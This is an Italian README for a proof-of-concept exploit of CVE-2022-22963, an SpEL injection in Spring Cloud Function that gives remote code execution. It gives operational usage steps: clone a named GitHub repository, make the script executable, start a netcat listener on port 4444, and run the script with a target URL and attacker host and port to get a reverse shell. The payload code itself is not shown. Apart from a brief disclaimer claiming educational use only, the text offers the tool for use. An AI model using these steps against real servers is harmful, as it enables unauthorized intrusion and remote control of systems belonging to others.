
Proof-of-concept exploit per CVE-2022-22963, un'iniezione SpEL in Spring Cloud Function che porta all'esecuzione di codice remoto. Include uno script shell per lo sfruttamento automatizzato con payload di reverse shell.
Nelle versioni 3.1.6, 3.2.2 e versioni precedenti di Spring Cloud Function, utilizzando la funzionalità di routing è possibile che un utente fornisca uno SpEL appositamente progettato come espressione di routing che può portare all'esecuzione remota di codice e all'accesso a risorse locali.
Clona il repository
git clone https://github.com/jrbH4CK/CVE-2022-22963.git
Entra nella cartella
cd CVE-2022-22963
Cambia i permessi di esecuzione
chmode +x springCloud.sh
Avvia nc sulla porta desiderata
nc -nlvp 4444
Esegui il comando seguente modificando i parametri secondo le tue esigenze
./springCloud.sh url lhost lport
NOTA: L'uso di questo repository è responsabilità di chi lo utilizza e non dell'autore, solo a scopo educativo.